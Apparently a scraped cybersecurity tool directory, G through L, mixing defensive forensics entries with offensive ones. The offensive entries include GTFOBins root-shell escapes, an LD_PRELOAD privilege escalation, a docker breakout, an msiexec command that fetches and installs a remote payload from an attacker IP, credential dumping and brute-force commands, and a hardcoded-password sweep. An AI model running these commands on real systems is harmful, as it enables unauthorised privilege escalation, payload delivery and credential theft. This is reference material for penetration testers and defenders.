Grep the filesystem for hardcoded credentials one-liner Linux

Enumeration Red Team

A broad but fast sweep of common config locations for embedded passwords, usually the highest-value five minutes on a freshly landed box.

grep -rliE 'password\s*=' /etc /var/www /opt 2>/dev/null
added by THUGS(red)

Grep the Windows Security log for failed logons (4625) one-liner Windows

Blue Team Enumeration Forensics

Pull failed-logon events straight from the command line for a quick brute-force check, without opening Event Viewer.

wevtutil qe Security /q:"*[System[(EventID=4625)]]" /f:text /c:20
added by THUGS(red)

Grep.app tool

OSINT Research Web

Fast full-text code search engine across half a million public Git repositories, useful for finding leaked secrets, specific library usage or vulnerable code patterns at scale.

visit → added by THUGS(red)

GreyNoise tool

Blue Team Network Research

Tracks internet-wide scanning and background noise so a defender can tell "this IP is mass-scanning the whole internet" apart from "this IP is targeting us specifically" — cuts a huge amount of false-positive triage out of alert review.

visit → added by THUGS(red)

Grouper2 tool Windows

Enumeration Offensive Red Team

Finds exploitable settings inside Active Directory Group Policy Objects — the GPO-focused counterpart to BloodHound's ACL/trust focus.

Grouper2.exe -f findings.html
visit → added by THUGS(red)

GRR Rapid Response tool

Blue Team Defensive Forensics

Google's remote live-forensics framework — agents on endpoints answer forensic queries (files, processes, registry, memory) at scale for incident responders who cannot ship a disk image for every host.

visit → added by THUGS(red)

Grype tool

Blue Team Cloud Defensive

Anchore's vulnerability scanner for container images and filesystems — pairs with Syft's SBOMs to give a fast, accurate CVE match against installed packages.

grype myapp:latest
visit → added by THUGS(red)

GTFOArgs tool Linux

Cheat Sheets Red Team

Companion project to GTFOBins cataloguing argument-injection tricks — binaries that can be abused not through their own function but by smuggling attacker-controlled flags into their invocation.

visit → added by THUGS(red)

GTFOBins tool Linux

CTF Red Team Research

Curated database of Unix binaries that can be abused to bypass local security restrictions (privesc, shell escape, file read/write) once you already have limited execution.

visit → added by THUGS(red)

GTFOBins: docker group container breakout one-liner Linux

Cloud Enumeration LOLBAS / LOTL Red Team

Membership in the docker group is root-equivalent: mounting the host filesystem into a throwaway container gives full read and write access to it.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
visit → added by THUGS(red)

GTFOBins: shell escape via find one-liner Linux

Enumeration LOLBAS / LOTL Red Team

find -exec spawns an arbitrary command, so a SUID or sudo-permitted find is a direct root shell.

find . -exec /bin/sh -p \; -quit
visit → added by THUGS(red)

GTFOBins: shell escape via vim one-liner Linux

Enumeration LOLBAS / LOTL Red Team

vim runs a shell command with :! at its own privilege level, making a SUID or sudo-permitted vim a straightforward escalation.

vim -c ':!/bin/sh' /dev/null
visit → added by THUGS(red)

GTFOBins: shell via awk one-liner Linux

Enumeration LOLBAS / LOTL Red Team

awk system() executes an arbitrary shell command, enough on its own if awk is SUID or sudo-permitted.

awk 'BEGIN {system("/bin/sh")}'
visit → added by THUGS(red)

GTFOBins: shell via less one-liner Linux

Enumeration LOLBAS / LOTL Red Team

less shells out through the same pager escape as vim and more, and ends up sudo-permitted surprisingly often for "read-only" log viewing.

less /etc/profile
# inside the pager:
!/bin/sh
visit → added by THUGS(red)

GTFOBins: shell via perl one-liner Linux

Enumeration LOLBAS / LOTL Red Team

perl exec() is another classic shell escape, common because perl ships on nearly every Unix-like system by default.

perl -e 'exec "/bin/sh";'
visit → added by THUGS(red)

GTFOBins: shell via python one-liner Linux

Enumeration LOLBAS / LOTL Red Team

A one-liner that drops into an interactive shell via os.system, the same technique behind most python-based privesc chains.

python3 -c 'import os; os.system("/bin/sh")'
visit → added by THUGS(red)

GTFOBins: sudo LD_PRELOAD privesc one-liner Linux

Enumeration Red Team

When sudoers keeps LD_PRELOAD in env_keep, a custom shared object constructor runs as root the moment any sudo-permitted command executes.

echo 'void _init(){setresuid(0,0,0);system("/bin/sh -p");}' > x.c
gcc -fPIC -shared -o x.so x.c -nostartfiles
sudo LD_PRELOAD=./x.so <any allowed command>
visit → added by THUGS(red)

GTFOBins: systemctl pager escape one-liner Linux

Enumeration LOLBAS / LOTL Red Team

systemctl status pipes long output through less by default, so a sudo-permitted systemctl inherits the same shell escape as less.

sudo systemctl status trap
# inside the pager:
!/bin/sh
visit → added by THUGS(red)

GTFOBins: tar checkpoint privesc one-liner Linux

Enumeration LOLBAS / LOTL Red Team

A little-known tar feature runs an arbitrary checkpoint action, which becomes a root shell when tar is SUID or sudo-permitted.

tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
visit → added by THUGS(red)

Guymager tool Linux

Blue Team Forensics

Fast, free forensic disk imaging GUI for Linux — multi-threaded compression, EWF/E01/raw output and on-the-fly hash verification during acquisition.

visit → added by THUGS(red)

h8mail tool

OSINT Recon

Email OSINT and breach-hunting tool that aggregates results from Have I Been Pwned, breach-directory APIs and local dump files against a target address.

h8mail -t [email protected]
visit → added by THUGS(red)

HackTricks tool

Cheat Sheets Red Team Whitebox

A community-maintained methodology wiki covering pentesting techniques across web, cloud, AD, mobile and binary exploitation — organised as a checklist you actually work through during an engagement.

visit → added by THUGS(red)

Hash every file in a tree for a quick IOC sweep one-liner Linux

Blue Team Forensics Hashing

Generates a SHA-256 hash list of an entire directory tree in one pass — feed the output into a threat-intel lookup or diff it against a known-good baseline.

find . -type f -exec sha256sum {} \; > hashes.txt
added by THUGS(red)

hash-identifier tool

CTF Hashing

Older interactive Python tool for guessing a hash's algorithm from its format — largely superseded by hashID/Name-That-Hash but still shipped on many distros.

python hash-identifier.py
visit → added by THUGS(red)

hashcat tool

Brute Force CTF Hashing

The world's fastest password-recovery tool — GPU-accelerated cracking across hundreds of hash modes, from a straight dictionary attack to rule-based and mask attacks.

hashcat -m 1000 -a 0 hashes.txt rockyou.txt
visit → added by THUGS(red)

HashClash tool Linux

Cryptography Hashing

Marc Stevens' toolkit for generating MD5 and SHA-1 chosen-prefix collisions — the codebase behind the SHAttered attack, used in CTF challenges that ask you to produce two files with the same weak hash.

visit → added by THUGS(red)

hashID tool

CTF Hashing

Identifies possible hash types from a string and reports the matching Hashcat mode number(s) — a lighter, older tool than Name-That-Hash but still widely referenced.

hashid <hash>
visit → added by THUGS(red)

HashPump tool Linux

Cryptography CTF Hashing

Performs the hash length extension attack against MD5/SHA1/SHA256/SHA512-based MACs, forging a valid hash for attacker-appended data without knowing the secret key.

hashpump -s <hash> -d <data> -k <keylen> -a <append>
visit → added by THUGS(red)

Have I Been Pwned tool

OSINT Research

Troy Hunt's free breach-notification service — checks whether an email or password has appeared in a known data breach, with a domain-level API for organisations.

visit → added by THUGS(red)

Havoc tool

Offensive Red Team

A modern, modular command-and-control framework built for red-team operators, with a Qt-based teamserver client and a plugin system for custom modules.

visit → added by THUGS(red)

Hayabusa tool

Blue Team Enumeration Forensics

A Rust-based Windows Event Log fast-forensics timeline generator, built by Yamato Security — evaluates Sigma-compatible rules across EVTX files and outputs a scored, sortable timeline for triage.

hayabusa csv-timeline -d evtx_dir/ -o timeline.csv
visit → added by THUGS(red)

hcxdumptool tool Linux

Brute Force Red Team Wireless / WiFi

Captures WPA/WPA2 handshakes and PMKIDs straight off the air (including from clientless APs) without needing a connected station to deauth.

sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
visit → added by THUGS(red)

hcxtools tool Linux

Brute Force Hashing Wireless / WiFi

Converts hcxdumptool/airodump-ng captures into hashcat/John-crackable formats (22000, PMKID) — the modern replacement for the old cap2hccapx pipeline.

hcxpcapngtool -o hashes.22000 capture.pcapng
visit → added by THUGS(red)

HELK (Hunting ELK) tool

Blue Team Defensive

Roberto Rodriguez's advanced hunting platform on the Elastic Stack — adds Spark/Jupyter analytics and graph capability on top of ELK for large-scale hypothesis-driven threat hunting.

visit → added by THUGS(red)

HijackLibs tool Windows

Red Team Research

Curated database of known DLL hijacking opportunities in legitimate Windows and third-party software, indexed by binary, missing DLL and export requirements.

visit → added by THUGS(red)

Hindsight tool

Blue Team Forensics

Parses a Chrome/Chromium profile's history, cache, cookies, downloads and autofill into a single timeline and generates a Chrome-viewable HTML report — browser forensics without hand-decoding SQLite and LevelDB by hand.

python3 hindsight.py -i "Default" -o report
visit → added by THUGS(red)

Holehe tool

OSINT Recon

CLI tool that checks whether an email address is registered on 120+ websites (via password-reset/registration timing leaks), without ever notifying the target.

holehe [email protected]
visit → added by THUGS(red)

HollowsHunter tool Windows

Blue Team Malware

Runs PE-sieve across every running process on a system in one pass, flagging and dumping any that show signs of process hollowing or code injection — a whole-host sweep rather than a single-process check.

hollows_hunter64.exe
visit → added by THUGS(red)

Honeyd tool Linux

Blue Team Network

Classic low-interaction honeypot framework that can simulate thousands of virtual hosts with different OS fingerprints on a single machine, to soak up and log network scans.

honeyd -f honeyd.conf
visit → added by THUGS(red)

Honeytrap tool Linux

Blue Team Network

Extensible, event-driven honeypot framework — dynamically spins up service listeners in response to observed connection attempts, geared toward capturing novel attack traffic.

visit → added by THUGS(red)

Honggfuzz tool Linux

Binary / RE Fuzzing

Google's security-oriented fuzzer that can drive coverage from hardware performance counters as well as compile-time instrumentation, useful when source is unavailable.

honggfuzz -i in -o out -- ./target ___FILE___
visit → added by THUGS(red)

Hopper Disassembler tool

Binary / RE CTF

Commercial disassembler/decompiler for macOS and Linux binaries (x86/x64/ARM), a common pick where Ghidra/IDA feel heavier than a single-binary CTF challenge needs.

visit → added by THUGS(red)

how2heap tool Linux

Binary / RE Cheat Sheets CTF

Shellphish's collection of annotated, runnable examples of glibc heap exploitation techniques (fastbin dup, unsafe unlink, tcache poisoning and more) across libc versions — the standard reference for learning heap pwn.

visit → added by THUGS(red)

HTTPTapper / mitmproxy tool

MITM Red Team Web

An interactive, scriptable HTTPS proxy for inspecting and modifying traffic on the fly — the open-source alternative to Burp when you need Python scripting against the traffic stream itself.

mitmproxy --mode transparent
visit → added by THUGS(red)

httpx tool

Recon Red Team Web

ProjectDiscovery's fast, multi-purpose HTTP probing tool — takes a list of hosts and reports which are alive, their titles, status codes, tech stack and more, in one pass.

cat subdomains.txt | httpx -title -tech-detect -status-code
visit → added by THUGS(red)

httpx (ProjectDiscovery) tool

Enumeration OSINT Recon Web

Fast, multi-purpose HTTP toolkit for probing a large list of hosts/subdomains — status codes, titles, tech fingerprints and TLS data — as a recon pipeline stage.

cat subs.txt | httpx -title -tech-detect -status-code
visit → added by THUGS(red)

Hunt Sysmon network connections by process one-liner Windows

Blue Team Defensive Network

Pulls Sysmon Event ID 3 (network connection) entries for a given process image — useful for confirming whether a suspicious binary actually phoned home.

Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' |
  Where-Object { $_.Id -eq 3 -and $_.Message -match 'powershell.exe' } |
  Select-Object TimeCreated, Message
added by THUGS(red)

Hunt Sysmon process creation events by command line one-liner Windows

Blue Team Defensive Forensics

Greps Sysmon Event ID 1 (process creation) for a suspicious substring in the command line — quick manual hunting when you do not yet have a Sigma rule for it.

Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' |
  Where-Object { $_.Id -eq 1 -and $_.Message -match 'EncodedCommand' } |
  Select-Object TimeCreated, Message
added by THUGS(red)

Hunt WMI event subscription persistence one-liner Windows

Blue Team Forensics

WMI event subscriptions (filter, consumer, binding) are a fileless persistence mechanism that a quick disk sweep will miss entirely.

Get-WmiObject -Namespace root\subscription -Class __EventFilter
Get-WmiObject -Namespace root\subscription -Class __EventConsumer
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding
added by THUGS(red)

Hunter.how tool

Device Search Search Engines

Internet-asset search engine with a particular focus on IoT/ICS device fingerprinting, alongside general host/service banner search.

visit → added by THUGS(red)

Hunter.io tool

OSINT Recon

Finds and verifies professional email addresses tied to a domain, including the naming pattern a company uses — a staple for recon during phishing-simulation and social-engineering engagements.

visit → added by THUGS(red)

Hurricane Electric BGP Toolkit tool

DNS Network Recon

Looks up an ASN's announced prefixes, peers and reverse-DNS in-bulk, a go-to reference for understanding whose network address space actually belongs to.

visit → added by THUGS(red)

Hybrid Analysis tool

Blue Team Malware

CrowdStrike's free public malware sandbox (Falcon Sandbox front end) — submit a sample or hash and get a detailed static/dynamic report, MITRE ATT&CK mapping included.

visit → added by THUGS(red)

Hydra tool

Brute Force Network Red Team

A parallelised network login cracker supporting dozens of protocols (SSH, FTP, HTTP forms, RDP, SMB…) — the go-to tool the moment you have a login form and a wordlist.

hydra -l admin -P passwords.txt ssh://10.10.10.10
visit → added by THUGS(red)

HydraBus tool

Hardware

STM32-based open-source hardware for UART/SPI/I2C/JTAG/CAN work, in the same niche as the Bus Pirate but built around faster hardware and an extensible HydraFW firmware.

picocom /dev/ttyACM0 -b 115200
visit → added by THUGS(red)

I2P tool

Network VPN / Anonymity

Anonymising overlay network built around garlic routing, distinct from Tor in design — used for peer-to-peer anonymous services rather than mainly anonymising exit traffic to the clear web.

visit → added by THUGS(red)

IACR ePrint Archive tool

Cryptography Research

The cryptography community's own preprint repository — new attacks, protocols and proofs are posted here well before appearing at CRYPTO, EUROCRYPT or a journal.

visit → added by THUGS(red)

ICIJ Offshore Leaks Database tool

OSINT Research

Searchable database of entities named in the ICIJ's cross-border investigations (Panama Papers, Paradise Papers, Pandora Papers and others).

visit → added by THUGS(red)

IDA Pro tool

Binary / RE

The long-standing commercial gold standard for disassembly and decompilation — deep processor/format support and a mature plugin ecosystem, still the default in a lot of professional RE work.

visit → added by THUGS(red)

IDCrawl tool

OSINT Search Engines

Free people- and username-search engine that aggregates social profiles, images and public records for a name or handle into one results page.

visit → added by THUGS(red)

Ignorant tool

OSINT Recon

Checks whether a phone number is registered on services such as Instagram, Snapchat and Amazon by abusing account-recovery flows, without alerting the target.

ignorant 33 612345678
visit → added by THUGS(red)

iLEAPP tool

Blue Team Forensics Mobile

Parses a full-filesystem iOS extraction into readable, categorised forensic reports (messages, location, app usage, health data) — the standard open-source companion to a Cellebrite/GrayKey iOS acquisition.

python3 ileapp.py -t fs -i extraction/ -o report/
visit → added by THUGS(red)

ILSpy tool

Binary / RE CTF

Open-source .NET decompiler with a CLI (ilspycmd) for scripted use alongside the desktop app, decompiling IL back to readable C#.

ilspycmd MyAssembly.dll -o out/
visit → added by THUGS(red)

ImHex tool

Binary / RE CTF Forensics

Hex editor built for reverse engineering, with a C++-like pattern language for describing and colour-highlighting a binary format live as you scroll through it.

visit → added by THUGS(red)

Immunity Debugger tool Windows

Binary / RE CTF

Windows debugger built for exploit development, with a Python API and the PyCommands ecosystem (mona.py) that a lot of older exploit-dev writeups still assume.

visit → added by THUGS(red)

Impacket tool

Network Offensive Red Team

A collection of Python classes for working with network protocols, and the toolset (secretsdump, psexec, GetUserSPNs, smbexec…) built on them — the backbone of most Windows/AD assessment tooling.

impacket-secretsdump DOMAIN/user:[email protected]
visit → added by THUGS(red)

INDXParse tool

Blue Team Forensics

Parses NTFS INDX ($I30) directory index attributes — surfaces filenames and timestamps for files that have since been deleted from a directory.

python INDXParse.py -d \$I30 > indx.csv
visit → added by THUGS(red)

INetSim tool Linux

Blue Team Malware Network

Simulates common internet services (HTTP, DNS, SMTP, FTP…) so malware detonated in an isolated lab thinks it has internet access — captures every request it makes.

inetsim --data-dir /var/lib/inetsim/data
visit → added by THUGS(red)

Infoga tool

OSINT Recon

Gathers email account information (source, validity, associated hostname) from public search engines and PGP key servers for a target domain.

python3 infoga.py --domain example.com --source all -v 2
visit → added by THUGS(red)

Insecam tool

Device Search Hardware OSINT

Directory of publicly reachable IP cameras with no or default authentication, browsable by country and manufacturer — an oft-cited example of what exposed device search finds.

visit → added by THUGS(red)

inspectrum tool Linux

Research SDR / RF

Offline viewer for analysing recorded IQ capture files by eye — zoom, measure and manually mark out symbols in a signal before writing a decoder for it.

inspectrum capture.cfile
visit → added by THUGS(red)

Install an MSI from a remote path one-liner Windows

LOLBAS / LOTL Red Team

msiexec fetches and silently installs an MSI straight from a UNC or HTTP path, the installer equivalent of the mshta trick.

msiexec /quiet /i http://10.10.14.7/payload.msi
visit → added by THUGS(red)

installutil — run code through an installer class hook one-liner Windows

LOLBAS / LOTL Red Team

InstallUtil.exe, a signed .NET Framework binary, will run a custom installer class's methods — a documented LOLBAS execution path.

InstallUtil.exe /logfile= /LogToConsole=false /U file.exe
visit → added by THUGS(red)

Intelligence X tool

OSINT Research

Search engine and data archive covering leaks, breaches, darknet content, WHOIS history and document dumps, searchable by selector (email, domain, IP, hash, Bitcoin address).

visit → added by THUGS(red)

IntelOwl tool

Blue Team Malware Research

A threat-intel aggregation platform that fans a single observable (hash, IP, domain, URL) out to dozens of analyzers — VirusTotal, AbuseIPDB, YARA, sandboxes — and returns one combined report instead of querying each by hand.

visit → added by THUGS(red)

IntelTechniques Tools tool

OSINT Recon

A companion search-tool page (distinct from the methodology site above) that auto-builds search-engine and social-media queries for a target across many services from one form.

visit → added by THUGS(red)

Intezer Analyze tool

Blue Team Malware

Malware analysis platform built around code-reuse/genetic similarity — classifies a sample by comparing its compiled code fragments against known malware and software libraries.

visit → added by THUGS(red)

IntoDNS tool

DNS Network

Checks a domain's DNS and mail-server configuration for common mistakes (missing glue, lame nameservers, SOA issues) and grades the result.

visit → added by THUGS(red)

Inveigh tool Windows

MITM Offensive Red Team

PowerShell/C# LLMNR, NBNS and mDNS spoofer for Windows-based operators — the Windows-side equivalent of Responder, with an interactive console.

Import-Module .\Inveigh.ps1; Invoke-Inveigh -NBNS Y -LLMNR Y
visit → added by THUGS(red)

InVID-WeVerify tool

Forensics OSINT

Browser-extension verification toolkit for images and video: keyframe extraction, reverse image search shortcuts and metadata inspection in one panel.

visit → added by THUGS(red)

Invoke-Obfuscation tool Windows

Payloads Red Team

Interactive PowerShell obfuscation framework — token, string, encoding and launcher obfuscation layers stacked together to evade signature detection.

Invoke-Obfuscation
visit → added by THUGS(red)

ipinfo.io tool

DNS Recon

IP geolocation and ASN lookup API/website, commonly wired into recon scripts for a quick org/location answer on an IP list.

curl -s ipinfo.io/1.1.1.1
visit → added by THUGS(red)

iptoasn.com tool

DNS Recon

Simple bulk IP-to-ASN lookup service with a downloadable dataset, useful when you need to tag a large IP list with owning ASN offline.

visit → added by THUGS(red)

IVRE tool Linux

Device Search Network Recon

Open-source network recon framework for running your own internet-wide or internal scans and organising the results in a queryable database, essentially a self-hosted Shodan.

visit → added by THUGS(red)

jadx tool

Binary / RE Mobile

Decompiles Android DEX bytecode back into readable Java source, with a GUI for browsing the result — usually paired with Apktool for a full APK reversing workflow.

jadx app.apk
visit → added by THUGS(red)

JD-GUI tool

Binary / RE CTF

Standalone Java decompiler GUI for browsing .class/.jar bytecode as reconstructed source — quick and disposable compared to a full IDE decompiler plugin.

visit → added by THUGS(red)

Jeffrey's Image Metadata Viewer tool

Forensics OSINT

Long-running EXIF/GPS metadata viewer for an image URL or upload — a quick, no-signup way to check what a photo leaks before ExifTool is available.

visit → added by THUGS(red)

JLECmd tool Windows

Blue Team Forensics

Eric Zimmerman's jump list parser — extracts recently/frequently accessed files and applications from AutomaticDestinations/CustomDestinations jump-list files.

JLECmd.exe -d C:\Users\<u>\AppData\... --csv out
visit → added by THUGS(red)

Joe Sandbox tool

Blue Team Malware

Deep-analysis malware sandbox with a free cloud-basic tier — hybrid static/dynamic/hypervisor-based analysis with especially detailed behaviour and evasion detection signals.

visit → added by THUGS(red)

John the Ripper tool

Brute Force CTF Hashing

A long-standing password cracker supporting hundreds of hash and cipher types, with the community "jumbo" fork adding formats and features far beyond the base distribution.

john --wordlist=rockyou.txt hashes.txt
visit → added by THUGS(red)

jsteg tool

CTF Steganography

Simple JPEG steganography tool for hiding and revealing data in the DCT coefficients of a JPEG file — a common CTF format that plain LSB-in-PNG tools do not handle.

jsteg reveal in.jpg out.txt
visit → added by THUGS(red)

JTAGulator tool

Brute Force Hardware

Hardware tool that brute-forces which pins on an unlabelled header are JTAG or UART, and at what configuration, before any actual debugging can start.

picocom /dev/ttyUSB0 -b 115200
visit → added by THUGS(red)

Just-Metadata tool

OSINT Recon

Gathers and visualises passive intelligence about a set of IP addresses (geolocation, org, historical activity) without touching the hosts themselves.

visit → added by THUGS(red)

justniffer tool Linux

Blue Team Network

Network protocol analyzer focused on HTTP — logs requests/responses in a customisable format similar to a web server access log, straight off the wire.

justniffer -i eth0 -p "http.request.uri"
visit → added by THUGS(red)

jwt_tool tool

Cryptography Red Team Web

A toolkit for testing, tampering with and cracking JSON Web Tokens — algorithm-confusion attacks, signature stripping, and a scan mode against a list of known JWT misconfigurations.

python3 jwt_tool.py <token> -T
visit → added by THUGS(red)

jwt-cracker tool

Brute Force Web

Brute-forces the HMAC secret used to sign a JWT (HS256/HS384/HS512), turning a weak signing key into a fully forgeable token.

jwt-cracker eyJhbGciOi... abcdefghijklmnopqrstuvwxyz 6
visit → added by THUGS(red)

Kali Linux tool Linux

CTF Red Team

The Debian-based Linux distribution built specifically for penetration testing, security research and forensics — hundreds of tools preinstalled and maintained by Offensive Security.

visit → added by THUGS(red)

Kali NetHunter tool Linux

Mobile Red Team Wireless / WiFi

Official Kali Linux mobile penetration testing platform — runs a Kali chroot/rootfs alongside Android, with wireless injection support and NetHunter-specific apps on compatible devices.

visit → added by THUGS(red)

Kamerka tool

Device Search Hardware OSINT

Builds interactive maps and screenshot galleries of internet-connected cameras and ICS devices discovered via internet scan-search-engine APIs.

visit → added by THUGS(red)

KAPE tool Windows

Blue Team Forensics

Kroll Artifact Parser and Extractor — targets collect and copy specific forensic artifacts (registry, event logs, prefetch, browser data…) and modules parse them, all in one fast pass.

kape.exe --tsource C: --tdest T:\triage --target !SANS_Triage --mdest M:\module --module !EZParser
visit → added by THUGS(red)

KAPE (Kroll Artifact Parser and Extractor) tool Windows

Blue Team Defensive Forensics

Targeted collection and parsing of forensic artifacts from a live or imaged Windows system in minutes — pulls only the files that matter (registry hives, event logs, browser history, prefetch) instead of a full disk image.

kape.exe --tsource C: --tdest D:\triage --target !SANS_Triage
visit → added by THUGS(red)

Karton tool

Blue Team Malware

CERT.pl's distributed malware analysis pipeline framework — chains classifiers, unpackers and config extractors as independent workers around a shared task queue.

visit → added by THUGS(red)

katana tool

Recon Red Team Web

A fast web crawler from ProjectDiscovery built for security testing — headless-browser-aware, JavaScript-parsing crawl that feeds URLs straight into fuzzing or nuclei.

katana -u https://target.tld -jc -d 3
visit → added by THUGS(red)

Kerbrute tool

Brute Force Enumeration Offensive Red Team

Quickly bruteforces and enumerates valid Active Directory usernames via Kerberos pre-authentication — much quieter than an LDAP bind sweep since failed guesses barely touch the event log.

kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt
visit → added by THUGS(red)

Keypatch tool

Binary / RE CTF

IDA plugin that uses Keystone to assemble and patch instructions directly in the disassembly view, instead of hand-editing raw bytes.

visit → added by THUGS(red)

Keystone tool

Binary / RE CTF

Multi-architecture assembler framework from the Capstone team — turns assembly text back into machine code for shellcode and patch development.

visit → added by THUGS(red)

KICS tool

Blue Team Cloud Defensive

Checkmarx's open-source IaC security scanner — thousands of queries across Terraform, Kubernetes, Docker, CloudFormation and more, built on the same query engine as Checkmarx's SAST.

kics scan -p ./infra -o results/
visit → added by THUGS(red)

Kismet tool Linux

Blue Team SDR / RF Wireless / WiFi

A wireless network and device detector, sniffer and WIDS framework — covers WiFi, Bluetooth, and SDR-fed protocols well beyond what aircrack-ng alone monitors.

kismet -c wlan0
visit → added by THUGS(red)

KLEE tool Linux

Binary / RE Research

Symbolic execution engine that runs LLVM bitcode and generates test cases covering every path it can reach — used for both bug-hunting and CTF challenges compiled to bitcode.

klee ./program.bc
visit → added by THUGS(red)

Koadic tool Windows

Offensive Payloads Red Team

JScript/VBScript-based C2 ("COM Command & Control") that lives almost entirely off Windows Script Host, useful for living-off-the-land style tradecraft demos.

python2 koadic.py
visit → added by THUGS(red)

Krakatau tool

Binary / RE CTF

Java decompiler and assembler that specifically handles malformed or deliberately obfuscated class files other decompilers choke on — a favourite when a CTF Java challenge fights back.

visit → added by THUGS(red)

kube-bench tool

Blue Team Cloud Defensive

Aqua Security's tool for checking whether Kubernetes is deployed according to the CIS Kubernetes Benchmark — runs as a pod against the cluster's own components.

kube-bench run --targets node,policies
visit → added by THUGS(red)

kube-hunter tool

Blue Team Cloud Enumeration

Hunts for security weaknesses in Kubernetes clusters — from inside a pod or from outside the network, probing the API server, kubelet and common misconfigurations.

kube-hunter --remote your-cluster-ip
visit → added by THUGS(red)

Kubescape tool

Blue Team Cloud Defensive

ARMO's Kubernetes security platform — scans manifests, live clusters and container images against NSA/CISA hardening guidance, MITRE ATT&CK for containers and custom frameworks.

kubescape scan framework nsa
visit → added by THUGS(red)

LAN Turtle tool

Hardware Network Red Team

Hak5's covert USB-Ethernet pass-through implant — sits inline on a wired network for remote access, recon and MITM modules while looking like a USB adapter.

visit → added by THUGS(red)

LAPSDumper tool Linux

Enumeration Offensive Red Team

Enumerates which computer accounts have LAPS-managed local admin passwords readable by the current user and dumps them over LDAP.

python3 laps.py -u user -p pass -d corp.local
visit → added by THUGS(red)

ldapdomaindump tool Linux

Enumeration Red Team

Dumps an Active Directory domain over LDAP into browsable HTML/JSON/CSV reports of users, groups, computers, policies and trusts.

ldapdomaindump -u corp.local\\user -p pass 10.10.10.5
visit → added by THUGS(red)

ldd a binary to spot a hijackable shared library path one-liner Linux

Binary / RE CTF Red Team

Lists a binary's dynamic library dependencies and where it resolves them from — if one resolves to a directory you can write to, that's a privesc primitive.

ldd ./suspicious-binary
added by THUGS(red)

LeakCheck tool

OSINT Search Engines

Breach-data search engine checking whether an email, username or password has surfaced in a known leak, with a public API for programmatic checks.

visit → added by THUGS(red)

LeakIX tool

Device Search OSINT Recon

Open-data search engine that indexes misconfigured/exposed services and leaked data found on the public internet, including open databases and plaintext credential leaks.

visit → added by THUGS(red)

LECmd tool Windows

Blue Team Forensics

Eric Zimmerman's LNK (shortcut) file parser — recovers target paths, volume serials, MAC addresses and timestamps embedded in Windows shortcut files.

LECmd.exe -f target.lnk
visit → added by THUGS(red)

Leonidas tool

Blue Team Cloud Defensive

WithSecure's framework for testing cloud detection and response by executing ATT&CK-mapped attack techniques against AWS/Azure/GCP, driven by simple YAML test definitions.

visit → added by THUGS(red)

libc-database tool

Binary / RE CTF

Local database and search tool for identifying which glibc build a leaked symbol address or offset belongs to, once you have leaked one libc pointer.

./find printf 7c0
visit → added by THUGS(red)

LibcSearcher tool

Binary / RE CTF

Python library that searches a local libc-database for the exact libc version matching one or more leaked symbol addresses, then resolves the offsets of other symbols in it.

visit → added by THUGS(red)

libewf / ewfacquire tool Linux

Blue Team Forensics

Library and CLI tools for reading/writing the Expert Witness Format (E01) used by EnCase/FTK — acquire, verify and mount E01 images from the command line.

ewfacquire /dev/sdb
visit → added by THUGS(red)

libFuzzer tool Linux

Binary / RE Fuzzing

In-process, coverage-guided fuzzing engine linked directly into an LLVM/Clang target — the standard way to fuzz a single function without forking a process per input.

clang -fsanitize=fuzzer,address target.c -o fuzz && ./fuzz
visit → added by THUGS(red)

libnfc (incl. mfoc / mfcuk) tool Linux

Hardware NFC / RFID

The base NFC hardware abstraction library most Linux NFC tooling is built on, including mfoc and mfcuk — the standard tools for recovering MIFARE Classic keys.

nfc-list
visit → added by THUGS(red)

LibreNMS tool

Blue Team Enumeration Network

Auto-discovering network monitoring platform — SNMP-based inventory and alerting across switches, routers, servers and more, a free alternative to commercial NMS suites.

visit → added by THUGS(red)

LIEF tool

Binary / RE

Library to parse, modify and abstract ELF, PE and Mach-O binaries from a single API — handy for scripting patches (add a section, change an entry point) without reaching for a hex editor.

visit → added by THUGS(red)

ligolo-ng tool

Network Red Team

A tunneling/pivoting tool that sets up a real network interface (TUN) on the attacker box, so pivoted traffic looks and behaves like normal routing rather than a SOCKS proxy.

# proxy: ./proxy -selfcert\n# agent: ./agent -connect 10.10.14.7:11601 -ignore-cert
visit → added by THUGS(red)

LimaCharlie tool

Blue Team Defensive

SecOps cloud platform built from composable primitives — an EDR-grade sensor, detection & response rules, and log ingestion, priced and built for building your own security stack.

visit → added by THUGS(red)

LiME (Linux Memory Extractor) tool Linux

Blue Team Forensics

Loadable kernel module for full Linux memory acquisition over network or to local disk — the standard way to capture RAM from a live Linux host for forensic analysis.

insmod lime.ko "path=/mnt/usb/mem.lime format=lime"
visit → added by THUGS(red)

List a user configured login items one-liner macOS

Enumeration Forensics

Login items are a user-visible persistence mechanism distinct from LaunchAgents, and osascript can enumerate them without opening System Settings.

osascript -e 'tell application "System Events" to get the name of every login item'
added by THUGS(red)

List active named pipes one-liner Windows

Blue Team Enumeration Forensics

Attacker C2 frameworks and lateral-movement tools frequently create distinctively named pipes; a mismatch against a known baseline is a fast lead.

[System.IO.Directory]::GetFiles("\.\pipe\")
added by THUGS(red)

List all loaded launchd jobs one-liner macOS

Enumeration Forensics

launchctl list shows every job launchd currently manages, including a job with no on-disk plist left to find.

launchctl list | grep -v com.apple
added by THUGS(red)

List an open S3 bucket with no credentials at all one-liner

Cloud Recon

If a bucket's ACL allows public listing, the AWS CLI enumerates it anonymously — the fastest possible bucket-exposure sanity check.

aws s3 ls s3://target-bucket-name --no-sign-request
visit → added by THUGS(red)

List current user crontab one-liner Linux

Blue Team Enumeration

Confirms what the current account itself has scheduled, useful both for enumeration and for spotting attacker persistence.

crontab -l
added by THUGS(red)

List current user privileges one-liner Windows

Enumeration Red Team

The first command in almost any Windows privesc checklist: a flag like SeImpersonatePrivilege or SeBackupPrivilege points straight at a known escalation path.

whoami /priv
added by THUGS(red)

List established outbound connections one-liner Linux

Blue Team Enumeration Network

Confirms what a process is actually talking to right now, the fastest way to spot a live C2 beacon or an exfil channel.

ss -tnp state established
added by THUGS(red)

List every LaunchAgent/LaunchDaemon on a Mac one-liner macOS

Blue Team Forensics Mobile

macOS persistence almost always lives in a LaunchAgent or LaunchDaemon plist — this lists every one across the user and system locations in one pass.

